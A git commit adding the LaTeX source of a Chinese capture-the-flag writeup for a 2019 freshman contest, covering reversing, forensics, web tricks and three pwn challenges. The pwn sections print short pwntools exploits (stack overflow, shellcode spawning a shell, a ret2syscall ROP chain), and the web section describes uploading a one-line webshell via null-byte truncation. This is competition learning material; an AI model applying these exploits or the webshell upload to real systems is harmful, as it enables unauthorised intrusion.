Sun, 31 Mar 2019 14:14:40 GMT

7 years ago · 4a74e8334e
parent 365ceb7e2f
commit 4a74e8334e
1 changed files with 216 additions and 0 deletions
--- a/0x3f-writeup/20190331/cugctf-writeup.tex
+++ b/0x3f-writeup/20190331/cugctf-writeup.tex
@ -0,0 +1,216 @@
+% Options for packages loaded elsewhere
+\PassOptionsToPackage{unicode=true}{hyperref}
+\PassOptionsToPackage{hyphens}{url}
+%
+\documentclass[
+]{ctexart}
+\usepackage{lmodern}
+\usepackage{amssymb,amsmath}
+\usepackage{ifxetex,ifluatex}
+\ifnum 0\ifxetex 1\fi\ifluatex 1\fi=0 % if pdftex
+  \usepackage[T1]{fontenc}
+  \usepackage[utf8]{inputenc}
+  \usepackage{textcomp} % provides euro and other symbols
+\else % if luatex or xelatex
+  \usepackage{unicode-math}
+  \defaultfontfeatures{Scale=MatchLowercase}
+  \defaultfontfeatures[\rmfamily]{Ligatures=TeX,Scale=1}
+\fi
+% Use upquote if available, for straight quotes in verbatim environments
+\IfFileExists{upquote.sty}{\usepackage{upquote}}{}
+\IfFileExists{microtype.sty}{% use microtype if available
+  \usepackage[]{microtype}
+  \UseMicrotypeSet[protrusion]{basicmath} % disable protrusion for tt fonts
+}{}
+\makeatletter
+\@ifundefined{KOMAClassName}{% if non-KOMA class
+  \IfFileExists{parskip.sty}{%
+    \usepackage{parskip}
+  }{% else
+    \setlength{\parindent}{0pt}
+    \setlength{\parskip}{6pt plus 2pt minus 1pt}}
+}{% if KOMA class
+  \KOMAoptions{parskip=half}}
+\makeatother
+\usepackage{xcolor}
+\IfFileExists{xurl.sty}{\usepackage{xurl}}{} % add URL line breaks if available
+\IfFileExists{bookmark.sty}{\usepackage{bookmark}}{\usepackage{hyperref}}
+\hypersetup{
+  pdftitle={0x3f 新生赛 writeup},
+  pdfauthor={TooYoungTooSimp},
+  hidelinks,
+}
+\urlstyle{same} % disable monospaced font for URLs
+\usepackage{color}
+\usepackage{fancyvrb}
+\newcommand{\VerbBar}{|}
+\newcommand{\VERB}{\Verb[commandchars=\\\{\}]}
+\DefineVerbatimEnvironment{Highlighting}{Verbatim}{commandchars=\\\{\}}
+% Add ',fontsize=\small' for more characters per line
+\newenvironment{Shaded}{}{}
+\newcommand{\AlertTok}[1]{\textcolor[rgb]{1.00,0.00,0.00}{\textbf{#1}}}
+\newcommand{\AnnotationTok}[1]{\textcolor[rgb]{0.38,0.63,0.69}{\textbf{\textit{#1}}}}
+\newcommand{\AttributeTok}[1]{\textcolor[rgb]{0.49,0.56,0.16}{#1}}
+\newcommand{\BaseNTok}[1]{\textcolor[rgb]{0.25,0.63,0.44}{#1}}
+\newcommand{\BuiltInTok}[1]{#1}
+\newcommand{\CharTok}[1]{\textcolor[rgb]{0.25,0.44,0.63}{#1}}
+\newcommand{\CommentTok}[1]{\textcolor[rgb]{0.38,0.63,0.69}{\textit{#1}}}
+\newcommand{\CommentVarTok}[1]{\textcolor[rgb]{0.38,0.63,0.69}{\textbf{\textit{#1}}}}
+\newcommand{\ConstantTok}[1]{\textcolor[rgb]{0.53,0.00,0.00}{#1}}
+\newcommand{\ControlFlowTok}[1]{\textcolor[rgb]{0.00,0.44,0.13}{\textbf{#1}}}
+\newcommand{\DataTypeTok}[1]{\textcolor[rgb]{0.56,0.13,0.00}{#1}}
+\newcommand{\DecValTok}[1]{\textcolor[rgb]{0.25,0.63,0.44}{#1}}
+\newcommand{\DocumentationTok}[1]{\textcolor[rgb]{0.73,0.13,0.13}{\textit{#1}}}
+\newcommand{\ErrorTok}[1]{\textcolor[rgb]{1.00,0.00,0.00}{\textbf{#1}}}
+\newcommand{\ExtensionTok}[1]{#1}
+\newcommand{\FloatTok}[1]{\textcolor[rgb]{0.25,0.63,0.44}{#1}}
+\newcommand{\FunctionTok}[1]{\textcolor[rgb]{0.02,0.16,0.49}{#1}}
+\newcommand{\ImportTok}[1]{#1}
+\newcommand{\InformationTok}[1]{\textcolor[rgb]{0.38,0.63,0.69}{\textbf{\textit{#1}}}}
+\newcommand{\KeywordTok}[1]{\textcolor[rgb]{0.00,0.44,0.13}{\textbf{#1}}}
+\newcommand{\NormalTok}[1]{#1}
+\newcommand{\OperatorTok}[1]{\textcolor[rgb]{0.40,0.40,0.40}{#1}}
+\newcommand{\OtherTok}[1]{\textcolor[rgb]{0.00,0.44,0.13}{#1}}
+\newcommand{\PreprocessorTok}[1]{\textcolor[rgb]{0.74,0.48,0.00}{#1}}
+\newcommand{\RegionMarkerTok}[1]{#1}
+\newcommand{\SpecialCharTok}[1]{\textcolor[rgb]{0.25,0.44,0.63}{#1}}
+\newcommand{\SpecialStringTok}[1]{\textcolor[rgb]{0.73,0.40,0.53}{#1}}
+\newcommand{\StringTok}[1]{\textcolor[rgb]{0.25,0.44,0.63}{#1}}
+\newcommand{\VariableTok}[1]{\textcolor[rgb]{0.10,0.09,0.49}{#1}}
+\newcommand{\VerbatimStringTok}[1]{\textcolor[rgb]{0.25,0.44,0.63}{#1}}
+\newcommand{\WarningTok}[1]{\textcolor[rgb]{0.38,0.63,0.69}{\textbf{\textit{#1}}}}
+\setlength{\emergencystretch}{3em} % prevent overfull lines
+\providecommand{\tightlist}{%
+  \setlength{\itemsep}{0pt}\setlength{\parskip}{0pt}}
+\setcounter{secnumdepth}{-\maxdimen} % remove section numbering
+% Redefines (sub)paragraphs to behave more like sections
+\ifx\paragraph\undefined\else
+  \let\oldparagraph\paragraph
+  \renewcommand{\paragraph}[1]{\oldparagraph{#1}\mbox{}}
+\fi
+\ifx\subparagraph\undefined\else
+  \let\oldsubparagraph\subparagraph
+  \renewcommand{\subparagraph}[1]{\oldsubparagraph{#1}\mbox{}}
+\fi
+
+% Set default figure placement to htbp
+\makeatletter
+\def\fps@figure{htbp}
+\makeatother
+
+
+\title{0x3f 新生赛 writeup}
+\author{TooYoungTooSimp}
+\date{2019/03/31}
+
+\begin{document}
+\maketitle
+
+{
+\setcounter{tocdepth}{3}
+\tableofcontents
+}
+\hypertarget{x3fux65b0ux751fux8d5b-writeup}{%
+\section{0x3f新生赛 Writeup}\label{x3fux65b0ux751fux8d5b-writeup}}
+
+\hypertarget{re}{%
+\subsection{Re}\label{re}}
+
+\hypertarget{r}{%
+\subsubsection{R}\label{r}}
+
+下载可执行文件，用IDA打开，在main函数的最后发现一些mov，将立即数用字符显示即得flag。
+
+\hypertarget{pwn}{%
+\subsection{Pwn}\label{pwn}}
+
+\hypertarget{pwn1}{%
+\subsubsection{pwn1}\label{pwn1}}
+
+简单的栈溢出
+
+\begin{Shaded}
+\begin{Highlighting}[]
+\ImportTok{from}\NormalTok{ pwn }\ImportTok{import} \OperatorTok{*}
+\NormalTok{pld}\OperatorTok{=}\StringTok{'a'}\OperatorTok{*}\BaseNTok{0x20}\OperatorTok{+}\StringTok{'b'}\OperatorTok{*}\DecValTok{8}\OperatorTok{+}\NormalTok{p64(}\BaseNTok{0x401182}\NormalTok{)}
+\NormalTok{sh}\OperatorTok{=}\NormalTok{process(}\StringTok{'./01'}\NormalTok{)}
+\NormalTok{sh.sendline(pld)}
+\NormalTok{sh.interactive()}
+\end{Highlighting}
+\end{Shaded}
+
+\hypertarget{pwn2}{%
+\subsubsection{pwn2}\label{pwn2}}
+
+通过提示可以找到C++的全局变量初始化函数，发现有mmap一块RWX的内存，而立即数反汇编后是\texttt{jmp\ rsp}，栈又可执行，所以题解如下：
+
+\begin{Shaded}
+\begin{Highlighting}[]
+\ImportTok{from}\NormalTok{ pwn }\ImportTok{import} \OperatorTok{*}
+\NormalTok{context.arch }\OperatorTok{=} \StringTok{'amd64'}
+\NormalTok{sh }\OperatorTok{=}\NormalTok{ process(}\StringTok{'./02'}\NormalTok{)}
+\NormalTok{pld }\OperatorTok{=} \StringTok{'a'} \OperatorTok{*} \BaseNTok{0x40} \OperatorTok{+} \StringTok{'b'} \OperatorTok{*} \DecValTok{8} \OperatorTok{+}\NormalTok{ p64(}\BaseNTok{0x666666660000}\NormalTok{) }\OperatorTok{+}\NormalTok{ asm(shellcraft.sh())}
+\NormalTok{sh.sendline(pld)}
+\NormalTok{sh.interactive()}
+\end{Highlighting}
+\end{Shaded}
+
+\hypertarget{pwn3}{%
+\subsubsection{pwn3}\label{pwn3}}
+
+没有pie，静态链接，显然是ret2syscall。用ROPgadget找到那些地址直接用就行了。注意当目标地址中含有\texttt{\textbackslash{}x0a}的时候会导致输入截断，因为\texttt{\textquotesingle{}\textbackslash{}n\textquotesingle{}\ ==\ \textquotesingle{}\textbackslash{}x0a\textquotesingle{}}。
+
+\begin{Shaded}
+\begin{Highlighting}[]
+\ImportTok{from}\NormalTok{ pwn }\ImportTok{import} \OperatorTok{*}
+\NormalTok{adb}\OperatorTok{=}\BaseNTok{0x080570c4}
+\NormalTok{cbx}\OperatorTok{=}\BaseNTok{0x0806f1b2}
+\NormalTok{bsh}\OperatorTok{=}\BaseNTok{0x080dc068}
+\NormalTok{i80}\OperatorTok{=}\BaseNTok{0x0804a31a}
+\NormalTok{sh}\OperatorTok{=}\NormalTok{process(}\StringTok{'./03'}\NormalTok{)}
+\NormalTok{pld}\OperatorTok{=}\NormalTok{flat([}\StringTok{'a'}\OperatorTok{*}\BaseNTok{0x30}\NormalTok{,}\StringTok{'b'}\OperatorTok{*}\DecValTok{4}\NormalTok{,adb,}\BaseNTok{0xb}\NormalTok{,}\DecValTok{0}\NormalTok{,bsh,cbx,}\DecValTok{0}\NormalTok{,bsh,i80])}
+\NormalTok{sh.sendline(pld)}
+\NormalTok{sh.interactive()}
+\end{Highlighting}
+\end{Shaded}
+
+\hypertarget{misc}{%
+\subsection{Misc}\label{misc}}
+
+\hypertarget{cap}{%
+\subsubsection{cap}\label{cap}}
+
+用提示给的网站修复cap，获得修复后的pcap包，跟踪TCP流，发现有两个位置上是lf和ga，将后面一系列包的这两位连起来就是flag了。
+
+\hypertarget{picture}{%
+\subsubsection{picture}\label{picture}}
+
+下载文件，解压后获得图片，用stegsolve打开，发现绿色通道最低位仿佛有信息，导出出来，根据提升修复bmp
+header，打开即见flag。
+
+\hypertarget{ux7b7eux5230}{%
+\subsubsection{签到}\label{ux7b7eux5230}}
+
+复制粘贴，没啥好说的。
+
+\hypertarget{web}{%
+\subsection{Web}\label{web}}
+
+\hypertarget{upload}{%
+\subsubsection{upload}\label{upload}}
+
+任意上传，用burpsuite拦截上传请求，使用0x00进行截断，用这种方法上传一句话木马，然后用中国菜刀类的工具浏览服务器目录，很容易就能发现flag
+
+\hypertarget{section}{%
+\subsubsection{404}\label{section}}
+
+打开开发者工具，发现虽然看起来是404，实际上是200，flag就在http
+headers里面。
+
+\hypertarget{ios88}{%
+\subsubsection{ios88}\label{ios88}}
+
+将user-agent改成ios的，然后把版本号都改成88，就能在http
+headers里找到flag了。
+
+\end{document}